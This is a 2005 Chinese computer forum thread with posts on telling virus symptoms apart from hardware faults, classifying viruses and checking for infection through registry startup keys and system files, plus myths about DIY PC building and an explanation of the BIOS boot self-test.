  电脑出故障不只是因为感染病毒才会有的,个人电脑使用过程中出现各种故障现象多是因为电脑本身的软、硬件故障引起的,网络上的多是由于权限设置所致。我们只有充分地了解两者的区别与联系,才能作出正确的判断,在真正病毒来了之时才会及时发现。下面我就简要列出了分别因病毒和软、硬件故障引起的一些常见电脑故障症状分析。

  症状 病毒的入侵的可能性 软、硬件故障的可能性

  经常死机:病毒打开了许多文件或占用了大量内存;不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多BUG);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。

  系统无法启动:病毒修改了硬盘的引导信息 ,或删除了某些启动文件。如引导型病毒 引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。

  文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏;硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时涮新服器的内容(长时间打开了资源管理器)。

  经常报告内存不够: 病毒非法占用了大量内存;打开了大量的软件;运行了需内存资源的软件;系统配置不正确;内存本就不够(目前基本内存要求为128M)等。

  提示硬盘空间不够:病毒复制了大量的病毒文件(这个遇到过好几例,有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了,一安装软件就提示硬盘空间不够。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的“私人盘”使用空间限制,因查看的是整个网络盘的大小,其实“私人盘”上容量已用完了。

  软盘等设备未访问时出读写信号:病毒感染;软盘取走了还在打开曾经在软盘中打开过的文件。

  出现大量来历不明的文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。

  启动黑屏:病毒感染(记得最深的是98年的4.26,我为CIH付出了好几千元的代价,那天我第一次开机到了Windows画面就死机了,第二次再开机就什么也没有了);显示器故障;显示卡故障;主板故障;超频过度;CPU损坏等等

  数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其它用户误删除了。

  键盘或鼠标无端地锁死:病毒作怪,特别要留意“木马”;键盘或鼠标损坏;主板上键盘或鼠标接口损坏;运行了某个键盘或鼠标锁定程序,所运行的程序太大,长时间系统很忙,表现出按键盘或鼠标不起作用。

  系统运行速度慢:病毒占用了内存和CPU资源,在后台运行了大量非法操作;硬件配置低;打开的程序太多或太大;系统配置不正确;如果是运行网络上的程序时多数是由于你的机器配置太低造成,也有可能是此时网路上正忙,有许多用户同时打开一个程序;还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

  系统自动执行操作:病毒在后台执行非法操作;用户在注册表或启动组中设置了有关程序的自动运行;某些软件安装或升级后需自动重启系统。

  通过以上的分析对比,我们知道其实大多数故障都可能是由于人为或软、硬件故障造成的,当我们发现异常后不要急于下断言,在杀毒还不能解决的情况下,应仔细分析故障的特征,排除软、硬件及人为的可能性。

  病毒的分类及各自的特征

  要真正地识别病毒,及时的查杀病毒,我们还有必要对病毒有一番较详细的了解,而且越详细越好!

  病毒因为由众多分散的个人或组织单独编写,也没有一个标准去衡量、去划分,所以病毒的分类可按多个角度大体去分。

  如按传染对象来分,病毒可以划分为以下几类:

  a、引导型病毒

  这类病毒攻击的对象就是磁盘的引导扇区,这样就能使系统在启动时获得优先的执行权,从而达到控制整个系统的目的,这类病毒因为感染的是引导扇区,所以造成的损失也就比较大,一般来说会造成系统无法正常启动,但查杀这类病毒也较容易,多数杀毒软件都能查杀这类病毒,如KV300、KILL系列等。

  b、文件型病毒

  早期的这类病毒一般是感染以exe、com等为扩展名的可执行文件,这样的话当你执行某个可执行文件时病毒程序就跟着激活。近期也有一些病毒感染以dll、ovl、sys等为扩展名的文件,因为这些文件通常是某程序的配置、链接文件,所以执行某程序时病毒也就自动被子加载了。它们加载的方法是通过插入病毒代码整段落或分散插入到这些文件的空白字节中,如CIH病毒就是把自己拆分成9段嵌入到PE结构的可执行文件中,感染后通常文件的字节数并不见增加,这就是它的隐蔽性的一面。

  c、网络型病毒

  这种病毒是近几来网络的高速发展的产物,感染的对象不再局限于单一的模式和单一的可执行文件,而是更加综合、更加隐蔽。现在一些网络型病毒几乎可以对所有的OFFICE文件进行感染,如WORD、EXCEL、电子邮件等。其攻击方式也有转变,从原始的删除、修改文件到现在进行文件加密、窃取用户有用信息(如黑客程序)等,传播的途经也发生了质的飞跃,不再局限磁盘,而是通过更加隐蔽的网络进行,如电子邮件、电子广告等。

  d、复合型病毒

  把它归为“复合型病毒”,是因为它们同时具备了“引导型”和“文件型”病毒的某些特点,它们即可以感染磁盘的引导扇区文件,也可以感染某此可执行文件,如果没有对这类病毒进行全面的清除,则残留病毒可自我恢复,还会造成引导扇区文件和可执行文件的感染,所以这类病毒查杀难度极大,所用的杀毒软件要同时具备查杀两类病毒的功能。

  以上是按照病毒感染的对象来分,如果按病毒的破坏程度来分,我们又可以将病毒划分为以下几种:

  a、良性病毒:

  这些病毒之所以把它们称之为良性病毒,是因为它们入侵的目的不是破坏你的系统,只是想玩一玩而已,多数是一些初级病毒发烧友想测试一下自己的开发病毒程序的水平。它们并不想破坏你的系统,只是发出某种声音,或出现一些提示,除了占用一定的硬盘空间和CPU处理时间外别无其它坏处。如一些木马病毒程序也是这样,只是想窃取你电脑中的一些通讯信息,如密码、IP地址等,以备有需要时用。

  b、恶性病毒

  我们把只对软件系统造成干扰、窃取信息、修改系统信息,不会造成硬件损坏、数据丢失等严重后果的病毒归之为“恶性病毒”,这类病毒入侵后系统除了不能正常使用之外,别无其它损失,系统损坏后一般只需要重装系统的某个部分文件后即可恢复,当然还是要杀掉这些病毒之后重装系统。

  c、极恶性病毒

  这类病毒比上述b类病毒损坏的程度又要大些,一般如果是感染上这类病毒你的系统就要彻底崩溃,根本无法正常启动,你保分留在硬盘中的有用数据也可能随之不能获取,轻一点的还只是删除系统文件和应用程序等。

  d、灾难性病毒

  这类病毒从它的名字我们就可以知道它会给我们带来的破坏程度,这类病毒一般是破坏磁盘的引导扇区文件、修改文件分配表和硬盘分区表,造成系统根本无法启动,有时甚至会格式化或锁死你的硬盘,使你无法使用硬盘。如果一旦染上这类病毒,你的系统就很难恢复了,保留在硬盘中的数据也就很难获取了,所造成的损失是非常巨大的,所以我们进化论什么时候应作好最坏的打算,特别是针对企业用户,应充分作好灾难性备份,还好现在大多数大型企业都已认识到备份的意义所在,花巨资在每天的系统和数据备份上,虽然大家都知道或许几年也不可能遇到过这样灾难性的后果,但是还是放松这“万一”。我所在的雀巢就是这样,而且还非常重视这个问题。如98年4.26发作的CIH病毒就可划归此类,因为它不仅对软件造成破坏,更直接对硬盘、主板的BIOS等硬件造成破坏。

  如按其入侵的方式来分为以下几种:

  a、源代码嵌入攻击型

  从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序,病毒是在源程序编译之前插入病毒代码,最后随源程序一起被编译成可执行文件,这样刚生成的文件就是带毒文件。当然这类文件是极少数,因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序,况且这种入侵的方式难度较大,需要非常专业的编程水平。

  b、代码取代攻击型

  这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块,这类病毒也少见,它主要是攻击特定的程序,针对性较强,但是不易被发现,清除起来也较困难。

  c、系统修改型

  这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能,由于是直接感染系统,危害较大,也是最为多见的一种病毒类型,多为文件型病毒。

  d、外壳附加型

  这类病毒通常是将其病毒附加在正常程序的头部或尾部,相当于给程序添加了一个外壳,在被感染的程序执行时,病毒代码先被执行,然后才将正常程序调入内存。目前大多数文件型的病毒属于这一类。

  有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒,要知道这些我们可以按以下几个方法来判断。

  1、反病毒软件的扫描法

  这恐怕是我们绝大数朋友首选,也恐怕是唯一的选择,现在病毒种类是越来越多,隐蔽的手段也越来越高明,所以给查杀病毒带来了新的难度,也给反病毒软件开发商带来挑战。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及,病毒的开发和传播是越来越容易了,因而反病毒软件开发公司也是越来越多了。但目前比较有名的还是那么几个系统的反病毒软件,如金山毒霸、KV300、KILL、PC-cillin、VRV、瑞星、诺顿等。至于这些反病毒软件的使用在此就不必说叙了,我相信大家都有这个水平!

  2、观察法

  这一方法只有在了解了一些病毒发作的症状及常栖身的地方才能准确地观察到。如硬盘引导时经常出现死机、系统引导时间较长、运行速度很慢、不能访问硬盘、出现特殊的声音或提示等上述在第一大点中出现的故障时,我们首先要考虑的是病毒在作怪,但也不能一条胡洞走到底,上面我不是讲了软、硬件出现故障同样也可能出现那些症状嘛!对于如属病毒引起的我们可以从以下几个方面来观察:

  a、内存观察

  这一方法一般用在DOS下发现的病毒,我们可用DOS下的“mem/c/p”命令来查看各程序占用内存的情况,从中发现病毒占用内存的情况(一般不单独占用,而是依附在其它程序之中),有的病毒占用内存也比较隐蔽,用“mem/c/p”发现不了它,但可以看到总的基本内存640K之中少了那么区区1k或几K。

  b、注册表观察法

  这类方法一般适用于近来出现的所谓黑客程序,如木马程序,这些病毒一般是通过修改注册表中的启动、加载配置来达到自动启动或加载的,一般是在如下几个地方实现:

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windwos\CurrentVersion\Run]

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windwos\CurrentVersionRunOnce]

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windwos\CurrentVersionRunSevices]

  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

  [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion

  \RunOnce]

  等等,具体可参考我的另一篇文章——《通通透透看木马》,在其中对注册表中可能出现的地方会有一个比较详尽的分析。

  c、系统配置文件观察法

  这类方法一般也是适用于黑客类程序,这类病毒一般在隐藏在system.ini 、wini.ini(Win9x/WinME)和启动组中,在system.ini文件中有一个"shell=”项,而在wini.ini文件中有“load= ”、“run= ”项,这些病毒一般就是在这些项目中加载它们自身的程序的,注意有时是修改原有的某个程序。我们可以运行Win9x/WinME中的msconfig.exe程序来一项一项查看。具体也可参考我的《通通透透看木马》一文。

  d、特征字符串观察法

  这种方法主要是针对一些较特别的病毒,这些病毒入侵时会写相应的特征代码,如CIH病毒就会在入侵的文件中写入“CIH”这样的字符串,当然我们不可能轻易地发现,我们可以对主要的系统文件(如Explorer.exe)运用16进制代码编辑器进行编辑就可发现,当然编辑之前最好还要要备份,毕竟是主要系统文件。

  e、硬盘空间观察法

  有些病毒不会破坏你的系统文件,而仅是生成一个隐藏的文件,这个文件一般内容很少,但所占硬盘空间很大,有时大得让你的硬盘无法运行一般的程序,但是你查又看不到它,这时我们就要打开资源管理器,然后把所查看的内容属性设置成可查看所有属性的文件(这方法应不需要我来说吧?),相信这个庞然大物一定会到时显形的,因为病毒一般把它设置成隐藏属性的。到时删除它即可,这方面的例子在我进行电脑网络维护和个人电脑维修过程中见到几例,明明只安装了几个常用程序,为什么在C盘之中几个G的硬盘空间显示就没有了,经过上述方法一般能很快地让病毒显形的
鱼溺水而亡,是为了让大海能够记住他~
38楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:19   |  只看该作者   |  转账至  82622206

装机过程中的十大问题

  DIY装机的稳定性不好





  在很多用户的心目中,似乎DIY兼容机总是背负着“稳定性不佳”的莫须有罪名。事实上,如今PC的生产已经实现了高度配套化,很多品牌机厂商所做的也仅仅是组装,然后便是严格的稳定性测试。更为重要的是,在制作工艺飞速发展之下,硬件集成度越来越高,PC内部的架构已经远不如以往那样复杂,组装PC的技术含量也大幅度下降。

  可以负责地说,DIY装机并不等于稳定性不好。只要产品质量过关,组合得当,那么其稳定性完全可以媲美于品牌机。当然,这一前提条件是大家不能忽视的。部分商家为了牟取暴利而千万百计地使用劣质产品,这直接损害了兼容机的形象。从本质上说,“兼容机”这一名称或许并不合适,因为DIY装机并无所谓“兼容”之说。采用与品牌机相同的配件,甚至性能还更上一层楼,此时兼容性与品牌机没有任何区别。更为重要的是,在DIY装机之风日益盛行之后,它反倒体现出一定的兼容性优势,各个配件之间可以很方便地协调工作。反观品牌机,各种独立设计令今后的升级非常不便,最典型的例子莫过于品牌机主板需要特殊挡板以及品牌机需要专用某一品牌的内存等等。

  AMD处理器功耗太大





  或许是AMD的市场宣传力度不够,很多消费者一听到AMD就联想起巨大的功耗以及令人不敢恭维的兼容性。然而正如很多资深DIY用户所知道的那样,Athlon XP处理器在功耗方面并不见得比Pentium 4高多少。而在发热量方面,Athlon XP并非如很多用户想象中那样厉害。由于采用了更为先进的铜连接制程,因此Athlon XP的耐高温能力远高于Pentium 4,一般工作在60度以下是绝对安全的。

  在兼容性方面,AMD处理器也完全可以令人放心。CPU兼容性不佳的问题主要出现在Pentium时代。当时Intel为Pentium处理器配备了MMX指令集,而AMD与Cyrix都是通过授权方式得到MMX技术,因此在部分为MMX优化的软件中出现一些兼容性问题。发展到今日,无论是AthlonXP或者Duron,以及即将普及的Athlon64,都不会存在类似问题。

  5400RPM硬盘更加安全





  不可否认,硬盘在诸多PC配件中的稳定性是最差的,频繁的故障让很多用户记忆犹新。为此,不少消费者在选购硬盘时都相当谨慎,甚至点名要求5400RPM的低转速产品。在很多人的印象中,5400RPM的低转速硬盘更加安静,发热量也大幅度降低,因此寿命理应更长。然而这一说法并不成立。在7200RPM IDE硬盘诞生之初,Seagate的大灰熊系列确实遇到尴尬,但是就此将所有罪过归结为高转速是不公平的,进而永远对高转速存有偏见更是愚蠢的。

  如果真正了解现今的IDE硬盘技术的话,一定会对噪音有更加深刻的认识。转速并不是决定噪音大小的关键因素,通过出色的设计,硬盘厂商已经让7200RPM的硬盘变得十分安静,其微小的噪音几乎被CPU风扇完全遮盖。而从稳定性来看,7200RPM技术经过几年的发展之后已经非常成熟,返修率并没有明显高于5400RPM的低转速硬盘。既然72000RPM已经成为市场主流,体现出较大的性能优势,而且与低转速硬盘之间的价格差距微乎其微,我们又有什么理由拒绝呢?

  电源便宜就好





  很多消费者对主板、CPU、显卡等配件相当在意,而一提到电源等小配件就会不以为然,认为这类技术含量不高的产品只要能用即可。殊不知,电源对于PC稳定运行有着至关重要的影响。

  PC系统中各配件使用的都是低压直流电,因此电源就是供电的主角,如果把电流比作血液,那么电源就是计算机的心脏。市电进入电源后,首先经过扼流线圈和电容滤除高频杂波和干扰信号,接下来经过整流和滤波得到高压直流电,然后进入电源的开关电路。开关电路主要负责将直流电转换为高频脉动直流电,再送高频开关变压器降压,然后滤除高频交流部分,这样才得到电脑需要的较为“纯净”的低压直流电。毫无疑问,一旦电源的质量得不到保证,所有的配件都将在不稳定的电压下工作,长此以往将对寿命不利。很多硬盘频繁出现坏道的原因就是电源质量不好,这也是很多用户所忽视的。也正是看到这一问题,国家颁布了强制执行的3C认证,因此建议大家购买那些有保障的3C认证产品!

  整合主板一定省钱





  整合主板给很多用户的印象就是省钱,但是这并不是永恒不变的真理。以目前的nForce2 IGP以及I865G为例,其性价比并不高,甚至不如直接选择KT333以及I845E,再配上一款Radeon9200SE。整合主板的价值在于节省投资,而那些价格接近千元的产品显然让人难以接受。

  另一种现象便是超低价格的整合主板,不少商家甚至会准备诸如KM266、SiS730、I815E等过时的主板来“对付”要求低价格的用户。然而当我们真正从性价比角度去分析之后,发现这类整合主板完全不具备优势。或许多投资200元就能买到独立显卡,而此时的性能将完全上一个档次。

  DDR400内存是不二的选择





  DDR400是目前最热门的内存规范,然而真正能够使用上其全部威力的用户却不多。PC部件之间讲究协调工作,不然就可能造成投资浪费。以Pentium4平台为例,大多数处理器还停留在533MHz FSB阶段,此时即便是DDR400内存也只能委曲求全地工作在DDR333模式。AMD平台也不例外,当处理器没有达到400MHz FSB时,DDR400只是一种摆设。如果配合nForce2芯片组的话,强行将DDR异步运行于DDR400模式还会降低性能!

  显然,满足现实需求才是最重要的。如果不准备使用800MHz FSB的Pentium4以及400MHz FSB的Barton,并且也没有超频的打算,那么完全不必跟风般地追求DDR400。

  超频会影响稳定性





  超频是DIY装机中永恒的话题,但是不少用户对于超频一直敬而远之,生怕会缩短产品寿命。事实上,出于市场策略的原因,AMD与Intel经常将高频产品当作低端产品来卖,此时进行超频没有任何害处,反而能大幅度提高产品的性价比。

  真正的超频是建立在安全的基础上,如果能够让CPU稳定工作于合理的温度范围,并且稳定运行所有的应用程序,那么即便超频又何妨呢?

CPU与显卡失之偏颇

  对于3D游戏而言,强大的CPU和显卡都是必不可少的。然而部分消费者由于不了解PC架构,因此片面地追求某一方面,结果导致整体效果不佳,反而不能在3D游戏中获得令人满意的效果。事实上,在3D游戏中,每一个场景的构筑都需要显卡极大的工作量,屏幕上每一个景物都是由显卡根据图形透视原理,通过多个三角形的组合形成的,显卡既要保证近大远小的透视效果,还要根据第一视角的位置实现遮挡效果,这里自然对显卡的性能有着很大的需求。不过,CPU作为整个系统的中枢神经也有极为重要的地位。CPU在3D游戏中所起的作用就是对三维场景进行设计,显卡生成的每一个点都是由CPU规定。此外,CPU还要负责诸如游戏数据处理等工作,负担丝毫不亚于显卡。需要注意的是,如今的显卡GPU已经具备了相当的处理能力,可以有效减轻CPU的负担。然而,从另一个角度来看,CPU又可以模拟GPU的操作,使两者之间形成互补。

  毫无疑问,片面地强调CPU或者显卡的作用都是错误的,毕竟两者是不可分离的有机体。一般应该保证显卡与CPU的价格差距在600元以内,这样才不会形成明显的性能缺陷。

   强求名牌产品与多功能产品

  或许是品牌意识太过强烈,不少消费者在装机时要求清一色的名牌产品,认为这样才能保证产品质量。然而应当指出的是,名牌产品并不意味着高性能,中小品牌产品也不等于低质量!在如今产品同质化严重的时代,各个厂商之间的产品并没有很大的性能差异,甚至经常出现同一款OEM产品的现象,此时甚至谈不上品牌概念。即便是技术含量相对较高的主板,也不会因为品牌差异而造成巨大的性能差距。对于使用同一款芯片组的主板而言,其性能差距都是微乎其微的。当然,这里并非是说名牌产品不好,而且让大家合理地看到品牌优势,用自己的头脑进行性价比分析,做一个理智的消费者。

  关于产品的功能,也存在着一味求全的现象。对于大部分用户而言,也许如今很多主板的附加功能都是用不上的,如IEEE1394、光纤输出、千兆网卡等,这无异于是投资浪费。将钱花在刀口上,从自己的实际需求出发,这才是DIY装机的精髓。

  要预留足够的升级空间

  为了今后升级方便,装机时一定要预留足够的升级空间,甚至宁可多花一点钱,这是很多消费者的普遍心态。诚然,在装机时考虑到这一点并没有错,甚至是应该肯定的。但是如果过分考虑升级空间,你将会因此而得不偿失。

  目前PC技术正在高速度发展,接口的转变往往在一瞬间完成。以Intel为例,Socket 423刚刚推出,Socket 478就将其取代,而今后的Prescott和Dothan处理器甚至已经无法留守Socket 478平台。对于用户而言,奢望一款主板多次升级CPU已经是不可能的了。与其为了今后的升级而在选购产品时束手束脚,不如彻底将其抛之脑后!
鱼溺水而亡,是为了让大海能够记住他~
39楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:41   |  只看该作者   |  转账至  82622206

电脑启动故障分析

电脑的启动过程是一个非常复杂的过程,它有一个非常完善的自检体系,在你按下电源开关的几秒之内,要经历大约100多个检测步骤,以下是启动过程以及常见的问题和大致的判断;
(一)电源,主板,cpu;
    当按下电源开关时,电源开始供电,电脑的指示灯亮起;如果这个时候没有反应,电源指示灯,风扇也都没有转动,先检查以下计算机的各个线路有没有问题,如果线路正常,那有可能是计算机的电源或者是主板出了问题,具体是哪个,可以打开机箱用电表测一下。如果测试没有问题,那就是cpu出现了问题,更换后进行测试。
(二)内存,显卡等;
    电源刚开始供电的时候还是不稳定的,主板的控制芯片组会向cpu发出一个reset信号,也就是初始化,当电源供电稳定后,芯片会撤去reset信号,cpu马上会从地址FFFFOH处开始执行指令,这个地址在系统的bios地址范围内,一般的bios放在这里的是一条跳线指令,会跳到真正的启动代码处。系统bios的启动代码接下来做的就是post,也就是我们说得加电自检。它的主要任务是检测系统中的一些关键设备是否存在,能否正常工作,如显卡,内存等。
    如果这个时候系统的喇叭发出警报声,那就可能是内存或者显卡处问题了,具体错误类型一般可以从警报声的长短,以及次数判断。前边有位老大已经为大家列出了各种bios出错时的的表现;
(三)显卡,内存;
    接下来,bios 将检查显卡bios,找到之后调用它的初始化代码,由显卡bios完成显卡的初始化。这时候,大多都能看到屏幕的上方会列出一些显卡的信息,如芯片类型,现存类型等;我们可以看到的第一个画面就是它;查找完其他的设备的bios之后,系统将显示启动画面,其中包括系统bios的类型,序列号,版本号等内容。接着,bios将检测cpu的类型,和工作频率,这时会将结果显示在屏幕上,接着,开始测试内存的容量(当然,这个时候,可以ESC跳过)显示容量。
(四)硬盘,光驱,(软驱);
    接下来,bios开始检测系统中安装的一些标准硬件设备,如:硬盘,光驱,软驱,串行和并行接口等;标准设备检测完以后,系统bios内部支持即插即用的代码将开始检测和配这系统中的即插即用设备。这个时候出现的问题,一般为不能启动,或者找不到硬盘,除线路接触不好外,一般为硬盘的物理损伤,也有可能是硬盘的主引导区信息丢失。这时候就要检查病毒,并用软件重新建立或者恢复引导记录了;
(五)硬盘;
    到此所有的硬件都已经检测配置完成,系统的bios会重新在屏幕上显示出一个系统配置表,会类出硬件相关的参数;接下来,系统的bios将更新系统配置数据,然后执行他的最后一项任务,既根据用户制定的启动顺序,从光盘,或者从硬盘启动;如果选择的是从硬盘启动,系统bios将读取并执行这个活动分区的分区记录,主引导记录接着从分区表中找到活动分区,然后,读取并执行分区记录;这个时候出错,那肯定是软件故障了,比如:引导文件,系统文件丢失,或者被病毒修改;也可能包括硬盘出现物理坏道;
    完成以上检测后,你就可以听到进入系统的那一声美妙的声音了。
鱼溺水而亡,是为了让大海能够记住他~
40楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
 77 12345678